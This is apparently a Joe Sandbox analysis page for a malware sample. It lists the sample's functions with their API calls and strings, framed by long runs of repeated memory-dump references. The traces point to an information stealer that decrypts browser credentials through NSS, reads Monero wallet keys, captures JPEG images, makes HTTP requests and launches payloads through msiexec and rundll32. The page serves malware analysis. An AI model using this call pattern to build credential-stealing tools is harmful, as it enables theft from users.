Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e9ea2786f4c62a58fe9a9313e5a737d266b2e0113e785f5c236ae65e68e253
Instruction ID: 3245dd93b9289af4ba401186c8ae49b184b47966b3f790acfab5dda2b64d9da3
Opcode Fuzzy Hash: 87e9ea2786f4c62a58fe9a9313e5a737d266b2e0113e785f5c236ae65e68e253
Instruction Fuzzy Hash: B9319BB251C604EFD359BF28D88666AFBE4FF18310F064C2DE6D882250E7359494DB8B

Function 008B9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 008AC990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 008AC9A5

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0127D448,00000000,?,008C144C,00000000,?,?), ref: 008ACA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008ACA89
GetFileSize.KERNEL32(00000000,00000000), ref: 008ACA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008ACAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008ACAD9
StrStrA.SHLWAPI(?,0127D490,008C0B52), ref: 008ACAF7
StrStrA.SHLWAPI(00000000,0127D568), ref: 008ACB1E
StrStrA.SHLWAPI(?,0127DB38,00000000,?,008C1458,00000000,?,00000000,00000000,?,012790B8,00000000,?,008C1454,00000000,?), ref: 008ACCA2
StrStrA.SHLWAPI(00000000,0127DAF8), ref: 008ACCB9

Part of subcall function 008AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
Part of subcall function 008AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
Part of subcall function 008AC820: PK11_GetInternalKeySlot.NSS3 ref: 008AC88A
Part of subcall function 008AC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 008AC8A5
Part of subcall function 008AC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 008AC8EB
Part of subcall function 008AC820: PK11_FreeSlot.NSS3(?), ref: 008AC961

StrStrA.SHLWAPI(?,0127DAF8,00000000,?,008C145C,00000000,?,00000000,012790C8), ref: 008ACD5A
StrStrA.SHLWAPI(00000000,01278E78), ref: 008ACD71

Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978

lstrlen.KERNEL32(00000000), ref: 008ACE44
CloseHandle.KERNEL32(00000000), ref: 008ACE9C
NSS_Shutdown.NSS3 ref: 008ACEAA

Strings

, xrefs: 008AC9C6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 2717a1bab2a3189d74bc9b2857ab39d3e9af857cee68788023b0869d5416170f
Instruction ID: 3c23d4e4e4467882264df14e2d3f5c01b66d0a1bdeaa2bf59ecd8f0c4ca72a56
Opcode Fuzzy Hash: 2717a1bab2a3189d74bc9b2857ab39d3e9af857cee68788023b0869d5416170f
Instruction Fuzzy Hash: 4FE1EC71900108BBDB18EBA8DC95FEEB778FF14300F404169F516E6691EF346A4ACB66

Function 008B9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008B906C

Strings

image/jpeg, xrefs: 008B9136

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 2f2b4f27d5ed243ba035b9d2ab1ac138c99977694001b48ae2734c33900adbc3
Instruction ID: 58b71472f9a55c09612168f866852746ebb6584857d7da558bdaa89e2d1ac333
Opcode Fuzzy Hash: 2f2b4f27d5ed243ba035b9d2ab1ac138c99977694001b48ae2734c33900adbc3
Instruction Fuzzy Hash: 1271BAB5910208ABDB04EFE4DC89FEEB7B9FB58700F108518F615EB290DB34A945CB61

Function 008B17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 008B17C5
ExitProcess.KERNEL32 ref: 008B17D1

Strings

block, xrefs: 008B17B7

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 27174d2647ba00967909758f489c013e9047b653d2cc7fb50eabcd67ee858b54
Instruction ID: 8a53bc7620bb00c6119edf0fbc75947a94c8925191942a94d9951740d1e3c7f3
Opcode Fuzzy Hash: 27174d2647ba00967909758f489c013e9047b653d2cc7fb50eabcd67ee858b54
Instruction Fuzzy Hash: 025137B4A00249EBCF04DFA4D9A8AFE7BB5FB44744F908058E516EB340D774E942CB62

Function 008B2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

ShellExecuteEx.SHELL32(0000003C), ref: 008B31C5
ShellExecuteEx.SHELL32(0000003C), ref: 008B335D
ShellExecuteEx.SHELL32(0000003C), ref: 008B34EA

Strings

<, xrefs: 008B3490
"" , xrefs: 008B309A
/i ", xrefs: 008B33E4
/passive, xrefs: 008B345B
.dll, xrefs: 008B31E5
C:\Windows\system32\msiexec.exe, xrefs: 008B34BF
.msi, xrefs: 008B3398
C:\Windows\system32\rundll32.exe, xrefs: 008B3332

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 6ade432ceaa8f209b699dc7301553c4c9e9732e20d9a63bfbe8110b85abfe9a8
Instruction ID: 4bf468df2b9615da6fc2d41fc84afc00d3b570feec6fab6609986e3798ccde4e
Opcode Fuzzy Hash: 6ade432ceaa8f209b699dc7301553c4c9e9732e20d9a63bfbe8110b85abfe9a8
Instruction Fuzzy Hash: EE12ED71810108AADB19EBA4DC92FEEB778FF14300F504169F516A6691EF346B4ACF63

Function 008B52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A6303
Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A6385
Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
lstrlen.KERNEL32(00000000), ref: 008B532F

Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
lstrlen.KERNEL32(00000000), ref: 008B5383
lstrlen.KERNEL32(00000000), ref: 008B53AE

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Strings

ERROR, xrefs: 008B54A9
ERROR, xrefs: 008B530A
ERROR, xrefs: 008B53B9
ERROR, xrefs: 008B546F
ERROR, xrefs: 008B5432

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 143b7c696050994a16a15335639cd33720c4c1641ee86aed54d26d765382cd74
Instruction ID: 10bbdc20720e3089e3d0c9f73b9540eb220cfb84f4aa095180412efea9c8149b
Opcode Fuzzy Hash: 143b7c696050994a16a15335639cd33720c4c1641ee86aed54d26d765382cd74
Instruction Fuzzy Hash: 0F51B170910149ABDB28FF68C996AED7779FF11301F504028F446DA6A2DF346B46CB63

Function 008B12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
